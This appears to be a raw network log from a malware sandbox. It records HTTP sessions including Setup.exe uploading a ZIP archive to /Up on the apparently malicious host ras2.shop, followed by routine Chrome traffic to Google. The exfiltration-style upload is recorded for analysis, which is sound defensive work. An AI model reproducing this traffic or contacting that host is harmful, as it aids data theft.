                                                                                                                                                                                                                                                    2024-12-27 20:27:38 UTC1369INData Raw: 6b 56 46 6c 55 58 31 64 54 56 46 39 63 63 46 35 62 55 52 4d 59 47 31 6b 51 43 53 4a 49 44 51 55 54 53 52 56 4d 45 46 70 6b 47 67 38 51 56 46 39 53 58 31 35 61 61 46 4a 62 58 6c 78 65 58 46 6c 62 57 47 4a 66 57 46 70 57 58 6c 4a 63 58 46 78 6c 56 46 4e 43 56 46 41 62 47 78 42 64 49 67 49 58 51 67 6b 4d 47 30 6f 65 53 43 4a 52 55 52 41 4c 46 6c 4e 5a 56 56 46 70 55 31 78 65 55 6c 4e 61 57 56 52 58 59 6c 56 62 58 31 39 5a 56 31 74 58 56 6d 39 56 55 31 52 53 58 56 52 62 45 42 38 69 56 68 63 49 45 30 51 42 44 68 42 4f 4c 45 4d 58 57 31 55 57 41 78 56 61 55 47 70 66 58 46 78 66 56 6c 31 62 57 56 64 75 56 6c 52 61 58 6c 4e 61 58 31 39 57 61 56 78 62 58 31 64 58 55 6c 31 64 58 69 49 55 46 31 77 54 44 68 74 48 43 77 4d 69 52 52 6c 4a 45 31 31 64 46 51 67 52 62 31
                                                                                                                                                                                                                                                    Data Ascii: kVFlUX1dTVF9ccF5bURMYG1kQCSJIDQUTSRVMEFpkGg8QVF9SX15aaFJbXlxeXFlbWGJfWFpWXlJcXFxlVFNCVFAbGxBdIgIXQgkMG0oeSCJRURALFlNZVVFpU1xeUlNaWVRXYlVbX19ZV1tXVm9VU1RSXVRbEB8iVhcIE0QBDhBOLEMXW1UWAxVaUGpfXFxfVl1bWVduVlRaXlNaX19WaVxbX1dXUl1dXiIUF1wTDhtHCwMiRRlJE11dFQgRb1
                                                                                                                                                                                                                                                    2024-12-27 20:27:38 UTC1369INData Raw: 44 52 42 53 59 31 56 55 55 56 35 51 55 6c 31 51 56 32 64 56 57 6c 35 55 55 56 74 59 58 6c 35 6b 55 6c 70 63 57 46 68 53 55 31 42 51 61 42 6f 5a 45 46 38 57 41 78 56 46 41 6a 41 50 46 30 38 64 54 78 74 65 56 68 45 36 47 6b 56 61 57 6c 5a 59 57 6c 64 56 61 56 5a 53 56 56 78 56 55 6c 42 5a 58 33 42 54 57 56 68 62 57 56 35 65 55 46 78 6f 56 6c 64 54 45 78 67 62 57 52 41 4a 49 6b 38 45 41 67 6b 57 52 42 74 4a 45 57 6c 63 46 77 67 54 55 56 39 56 56 56 39 6e 56 31 4e 64 57 45 52 4a 56 56 56 51 61 6c 31 46 58 46 6c 64 57 31 74 54 57 6d 4a 62 57 31 46 64 55 31 49 56 48 68 46 75 47 67 38 51 52 67 55 4a 44 68 42 4f 4c 45 4d 58 57 31 55 57 41 78 56 65 51 32 5a 62 56 31 68 61 57 6c 42 64 51 6c 5a 6c 55 56 6c 65 57 46 4a 58 58 46 74 59 5a 31 5a 57 57 31 70 54 58 31 39
                                                                                                                                                                                                                                                    Data Ascii: DRBSY1VUUV5QUl1QV2dVWl5UUVtYXl5kUlpcWFhSU1BQaBoZEF8WAxVFAjAPF08dTxteVhE6GkVaWlZYWldVaVZSVVxVUlBZX3BTWVhbWV5eUFxoVldTExgbWRAJIk8EAgkWRBtJEWlcFwgTUV9VVV9nV1NdWERJVVVQal1FXFldW1tTWmJbW1FdU1IVHhFuGg8QRgUJDhBOLEMXW1UWAxVeQ2ZbV1haWlBdQlZlUVleWFJXXFtYZ1ZWW1pTX19


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    2192.168.2.449736104.21.2.1144436592C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-27 20:27:40 UTC162OUTPOST /Up HTTP/1.1
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream; boundary=----
                                                                                                                                                                                                                                                    User-Agent: MyApp/1.0
                                                                                                                                                                                                                                                    Host: ras2.shop
                                                                                                                                                                                                                                                    Content-Length: 349
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    2024-12-27 20:27:40 UTC337OUTData Raw: 50 4b 03 04 14 00 08 08 08 00 73 7b 9b 59 00 00 00 00 00 00 00 00 00 00 00 00 28 00 04 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 01 00 00 00 7d 8d bd 0e 02 21 1c c3 5f 85 74 66 e0 53 0e 46 e3 ea e2 e2 60 1c 38 0e 0d 89 01 03 17 bd c4 f8 ee fe 9f c0 ad fd b5 69 3f 88 08 d8 76 06 1c f3 4a 72 8e bd 16 32 09 41 71 dc 11 2e 38 96 d4 db 68 b7 95 ed e3 28 89 9d 72 5d 72 67 87 5e 5e b9 53 f5 7f 7e e5 78 20 48 a7 ad d6 ce 49 c9 d1 e8 e6 5c ea d2 de 83 49 41 03 4f 02 93 f7 d6 2a 32 1d c1 08 6f 39 06 51 a9 26 b1 49 a1 0c be 3f 50 4b 07 08 ad bc b0 53 7f 00 00 00 00 00 00 00 aa 00 00 00 00 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 73 7b 9b 59 ad bc b0 53 7f 00 00 00 aa 00 00 00 28 00
                                                                                                                                                                                                                                                    Data Ascii: PKs{Y(f1575b64-8492-4e8b-b102-4d26e8c70371.txt}!_tfSF`8i?vJr2Aq.8h(r]rg^^S~x HI\IAO*2o9Q&I?PKSPKs{YS(
                                                                                                                                                                                                                                                    2024-12-27 20:27:40 UTC12OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: --------
                                                                                                                                                                                                                                                    2024-12-27 20:27:40 UTC733INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 20:27:40 GMT
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H6W8PPvLt2SdfItnxUsITBzKVhMKUbM%2FSdNou0%2BAbMyXNbq%2BneAQrDt1UWBbKTU8e87C7SzJV4F0JJJEUjsfxs7a%2FAb4LqUnXnmIsQTEc7RANiWCEuM2eay09MA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f8c0d7a0a010dc7-EWR
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1844&min_rtt=1842&rtt_var=696&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=1193&delivery_rate=1567364&cwnd=211&unsent_bytes=0&cid=f3597d3742ce876c&ts=636&x=0"


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    3192.168.2.449744172.217.21.364437068C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-27 20:27:46 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC1219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 20:27:46 GMT
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-o8f_lsHvjJbjSjiXNQCRHQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/web
                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/web"}]}
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC171INData Raw: 61 36 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 5d 2c 5b 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 65 76 65 6e 74 69 64 22 3a 2d 32 30 37 39 36 34 32 39 31 34 39 33 39 37 39 35 30 30 38 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 5d 2c 22 67 6f 6f 67 6c 65 3a 76 65 72 62 61 74 69 6d 72 65 6c 65 76 61 6e 63 65 22 3a 38 35 31 7d 5d 0d
                                                                                                                                                                                                                                                    Data Ascii: a6)]}'["",[],[],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:suggesteventid":-2079642914939795008,"google:suggesttype":[],"google:verbatimrelevance":851}]
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC1INData Raw: 0a
                                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    4192.168.2.449745172.217.21.364437068C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-27 20:27:46 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC973INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Version: 705503573
                                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 20:27:47 GMT
                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC417INData Raw: 31 39 37 31 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                    Data Ascii: 1971)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 33 20 31 38 68 31 38 76 2d 32 48 33 76 32 7a 6d 30 2d 35 68 31 38 76 2d 32 48 33 76 32 7a 6d 30 2d 37 76 32 68 31 38
                                                                                                                                                                                                                                                    Data Ascii: ss\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC1390INData Raw: 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 41 64 20 67 62 5f 6c 64 20 67 62 5f 4b 65 20 67 62 5f 46 65 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63
                                                                                                                                                                                                                                                    Data Ascii: e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_wd gb_Ad gb_ld gb_Ke gb_Fe\"\u003e\u003c
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC1390INData Raw: 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 38 2e 35 2d 32 31 2e 35 54 33 35 30 2d 38 34 30 68 32 36 30 71 31 33 20 30 20 32 31 2e 35 20 38 2e 35 54 36 34 30 2d 38 31 30 71 30 20
                                                                                                                                                                                                                                                    Data Ascii: ght\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13 8.5-21.5T350-840h260q13 0 21.5 8.5T640-810q0
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC1390INData Raw: 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 5c 22 5c 75 30 30
                                                                                                                                                                                                                                                    Data Ascii: ,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2z\"\u00
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC544INData Raw: 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 32 35 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 2c 31 30 32 32 37 38 32 30 38 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30
                                                                                                                                                                                                                                                    Data Ascii: eriment_id":[3700325,3700949,3701384,102278205,102278208],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.xd\u00
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC292INData Raw: 31 31 64 0d 0a 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 79 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 49 20 2e 67 62 5f 41 5c 22 29 2c 7a 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 23 67 62 2e 67 62 5f 52 63 5c 22 29 3b 79 64 5c 75 30 30 32 36 5c 75 30 30 32 36 21 7a 64 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 78 64 28 5f 2e 67 64 2c 79 64 2c 5c 22 63 6c 69 63 6b 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 5f 2e
                                                                                                                                                                                                                                                    Data Ascii: 11dror(\"B`\"+b))}};\n}catch(e){_._DumpException(e)}\ntry{\nvar yd\u003ddocument.querySelector(\".gb_I .gb_A\"),zd\u003ddocument.querySelector(\"#gb.gb_Rc\");yd\u0026\u0026!zd\u0026\u0026_.xd(_.gd,yd,\"click\");\n}catch(e){_._DumpException(e)}\ntry{\n_.
                                                                                                                                                                                                                                                    2024-12-27 20:27:47 UTC1390INData Raw: 38 30 30 30 0d 0a 75 30 30 33 64 5c 22 75 6e 64 65 66 69 6e 65 64 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 2e 53 6e 61 70 73 68 6f 74 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 75 6e 63 74 69 6f 6e 5c 22 3f 61 5c 75 30 30 33 64 5c 75 30 30 33 65 61 5c 75 30 30 32 36 5c 75 30 30 32 36 41 73 79 6e 63 43 6f 6e 74 65 78 74 2e 53 6e 61 70 73 68 6f 74 2e 77 72 61 70 28 61 29 3a 61 5c 75 30 30 33 64 5c 75 30 30 33 65 61 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 42 64 3b 42 64 5c 75 30 30 33 64 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 5f 2e 6b 64 7b 7d 3b 5f 2e 43 64 5c 75 30 30 33 64 66 75 6e
                                                                                                                                                                                                                                                    Data Ascii: 8000u003d\"undefined\"\u0026\u0026typeof AsyncContext.Snapshot\u003d\u003d\u003d\"function\"?a\u003d\u003ea\u0026\u0026AsyncContext.Snapshot.wrap(a):a\u003d\u003ea;\n}catch(e){_._DumpException(e)}\ntry{\nvar Bd;Bd\u003dclass extends _.kd{};_.Cd\u003dfun
